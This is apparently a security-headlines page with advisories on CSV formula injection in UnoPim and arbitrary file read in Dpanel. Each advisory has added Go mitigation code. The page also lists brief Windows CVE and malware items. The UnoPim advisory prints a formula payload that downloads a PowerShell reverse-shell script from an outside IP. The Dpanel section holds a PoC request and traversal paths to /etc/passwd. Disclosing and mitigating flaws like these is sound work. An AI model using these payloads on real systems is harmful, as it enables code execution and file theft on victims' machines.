Security Headlines

Tag: #windows

GHSA-74rg-6f92-g6wx: UnoPim has CSV Injection on Quick Export feature

### Summary

`CSV Injection` (also called `Formula Injection`) is a vulnerability that occurs when attacker-controlled content is written into a CSV (Comma-Separated Values) file that is later opened in a spreadsheet application such as Microsoft Excel. The attack exploits the way spreadsheet software automatically interprets certain leading text patterns as formulas or commands rather than as plain text.

### Details

A basic test for CSV Injection is to use `SUM()` to add two numbers, or to launch calc.exe with the command `=cmd|' /C calc'!A0`. The same mechanism can be used to run arbitrary code on the victim's machine; for example, the payload below downloads and executes a script that opens a reverse TCP connection to the attacker's machine.

*Payload*:

> This is the payload that is placed in the vulnerable field during exploitation

```
=cmd|' /C powershell Invoke-WebRequest "http://52.172.182.242:7000/shell.ps1" -OutFile "$env:Temp\shell.ps1"; powershell -ExecutionPolicy Bypas...
```
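The defence on the export side is to neutralize any cell that a spreadsheet would evaluate before it is written out. The Go program below is an added example, not code from the advisory or from UnoPim (which is a PHP project); the trigger list, the sample rows and the apostrophe-prefix choice are this example's assumptions, taken from common CSV-injection guidance. It feeds the calc.exe payload quoted above through the export and shows it leaving as inert text, with `encoding/csv` doing the quoting so a value cannot break out of its field and start a new, unneutralized one.

```go
package main

import (
	"bytes"
	"encoding/csv"
	"fmt"
	"strings"
)

// formulaTriggers are the characters that spreadsheet applications treat as
// the start of a formula when they appear first in an imported cell. Tab and
// carriage return are covered by the whitespace trim in isFormulaLike.
// (Assumption based on common CSV-injection guidance, not on UnoPim's code.)
const formulaTriggers = "=+-@"

// isFormulaLike reports whether a spreadsheet would evaluate the cell rather
// than display it as text. Leading whitespace is stripped first because some
// importers discard it before looking at the first character, which makes
// the check deliberately conservative.
func isFormulaLike(cell string) bool {
	trimmed := strings.TrimLeft(cell, " \t\r\n")
	return trimmed != "" && strings.ContainsRune(formulaTriggers, rune(trimmed[0]))
}

// neutralizeCell prefixes a formula-like cell with an apostrophe, which
// spreadsheet applications interpret as "render the rest as text".
func neutralizeCell(cell string) string {
	if isFormulaLike(cell) {
		return "'" + cell
	}
	return cell
}

// exportCSV renders rows with every cell neutralized. encoding/csv quotes any
// field containing a comma, double quote or newline and doubles embedded
// quotes (RFC 4180), so a value cannot terminate its field early.
func exportCSV(rows [][]string) (string, error) {
	var buf bytes.Buffer
	w := csv.NewWriter(&buf)
	for _, row := range rows {
		safe := make([]string, len(row))
		for i, cell := range row {
			safe[i] = neutralizeCell(cell)
		}
		if err := w.Write(safe); err != nil {
			return "", err
		}
	}
	w.Flush()
	return buf.String(), w.Error()
}

func main() {
	// Constructed sample export: the second row carries the calc.exe payload
	// quoted in the advisory, as if an attacker had stored it in a product name.
	rows := [][]string{
		{"sku", "name"},
		{"A-1", "=cmd|' /C calc'!A0"},
		{"B-2", "Widget, large"},
	}
	out, err := exportCSV(rows)
	if err != nil {
		panic(err)
	}
	fmt.Print(out)
}
```

The trade-off of this approach is that legitimate values such as negative numbers (`-5`) also receive the apostrophe, and some applications display that apostrophe after import; that is the accepted cost of making exported data safe regardless of which spreadsheet opens it.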

ghsa | #csrf #vulnerability #web #mac #windows #microsoft
GHSA-gcqf-pxgg-gw8q: Dpanel has an arbitrary file read vulnerability

### Summary

Dpanel has an arbitrary file read vulnerability in the /api/app/compose/get-from-uri interface. Once logged in to Dpanel, this interface can be used to read arbitrary files.

### Details

When a user is logged into the administrative backend, this interface can read any file on the host/server (subject to the process's permissions), which may lead to system information leakage. The vulnerability lies in the GetFromUri function in app/application/http/controller/compose.go: the uri parameter submitted by the user in JSON format is passed directly to os.ReadFile and its contents returned without any security handling.

![image-20250702004157585](https://github.com/user-attachments/assets/1f0e683b-bf0b-49e6-8d68-833fcf3f214d)

![image-20250702004223184](https://github.com/user-attachments/assets/b5e89e02-f572-4edf-aaa8-566dea090d3f)

### PoC

```text
POST /api/app/compose/get-from-uri HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefo...
```
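The pattern described above, a user-supplied string handed straight to os.ReadFile, beside a hardened replacement, as an added example in Go (Dpanel's language). This is not Dpanel's code; the base directory, the `safeRead` policy and the sample compose file are this example's assumptions. The fix is not just a `..` filter: the path is rejected if absolute, checked lexically after `filepath.Clean`, then resolved through symlinks and re-checked against the resolved base, so a link planted inside the allowed directory cannot point the read at `/etc` or elsewhere.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// ErrOutsideBase is returned for any request whose target does not resolve
// to a file under the allowed base directory.
var ErrOutsideBase = errors.New("path escapes the allowed base directory")

// vulnerableRead reproduces the pattern the advisory describes: the
// caller-supplied string goes straight to os.ReadFile, so any authenticated
// user can read any file the process can open.
func vulnerableRead(uri string) ([]byte, error) {
	return os.ReadFile(uri)
}

// safeRead confines reads to baseDir (a hypothetical directory for compose
// files; the name and policy are this example's assumptions, not Dpanel's).
// It rejects absolute paths, catches ".." escapes lexically, then resolves
// symlinks and re-checks the real path before reading.
func safeRead(baseDir, userPath string) ([]byte, error) {
	if userPath == "" || filepath.IsAbs(userPath) {
		return nil, ErrOutsideBase
	}
	base, err := filepath.Abs(baseDir)
	if err != nil {
		return nil, err
	}
	base, err = filepath.EvalSymlinks(base)
	if err != nil {
		return nil, err
	}
	// Clean collapses "sub/../../x" into "../x", so one prefix test catches
	// every lexical traversal.
	rel := filepath.Clean(userPath)
	sep := string(filepath.Separator)
	if rel == ".." || strings.HasPrefix(rel, ".."+sep) {
		return nil, ErrOutsideBase
	}
	resolved, err := filepath.EvalSymlinks(filepath.Join(base, rel))
	if err != nil {
		return nil, err // missing file or dangling link: fail closed
	}
	if resolved != base && !strings.HasPrefix(resolved, base+sep) {
		return nil, ErrOutsideBase
	}
	return os.ReadFile(resolved)
}

func main() {
	// Constructed demo: one compose file under a temporary base directory.
	base, err := os.MkdirTemp("", "compose-base")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(base)
	if err := os.WriteFile(filepath.Join(base, "compose.yml"), []byte("services: {}\n"), 0o600); err != nil {
		panic(err)
	}
	for _, p := range []string{"compose.yml", "../../../../etc/passwd", "/etc/passwd"} {
		data, err := safeRead(base, p)
		fmt.Printf("%-26q -> data=%q err=%v\n", p, data, err)
	}
}
```

If the endpoint genuinely needs to accept remote URIs as well as local paths, parse the value first and route `http`/`https` schemes to an HTTP client with its own allowlist; never let the scheme decide whether a raw string reaches the filesystem.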

Cherry pie, Douglas firs and the last trip of the summer

Amy (ahem, Special Agent Dale Cooper) shares lessons from their trip to the Olympic Peninsula and cybersecurity travel tips for your last-minute adventures.

Google settles YouTube lawsuit over kids’ privacy invasion and data collection

Google has settled a lawsuit against YouTube for $30 million but did not admit collecting the data of minors for targeted advertising.

CVE-2025-55231: Windows Storage-based Management Service Remote Code Execution Vulnerability

Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Storage allows an unauthorized attacker to execute code over a network.

CVE-2025-55230: Windows MBT Transport Driver Elevation of Privilege Vulnerability

**What privileges could be gained by an attacker who successfully exploited this vulnerability?** An attacker who successfully exploited this vulnerability could gain SYSTEM privileges.

CVE-2025-55229: Windows Certificate Spoofing Vulnerability

Improper verification of cryptographic signature in Windows Certificates allows an unauthorized attacker to perform spoofing over a network.

New DripDropper Malware Exploits Linux Flaw Then Patches It Lock Rivals Out

A new report from Red Canary reveals a clever Linux malware called DripDropper that exploits a flaw and…

GHSA-hf86-8x8v-h7vc: Apache EventMesh Vulnerable to Server-Side Request Forgery in WebhookUtil.java

Server-Side Request Forgery (SSRF) in the eventmesh-runtime module (WebhookUtil.java), on Windows, Linux and macOS, allows an attacker to abuse functionality on the server to read or update internal resources. Users are recommended to upgrade to version 1.12.0 or use the master branch, which fixes this issue.

Ilevia EVE X1 Server 4.7.18.0.eden Credentials Leak Through Log Disclosure

The EVE X1 server suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'passwd' HTTP POST parameter in /ajax/php/login.php script.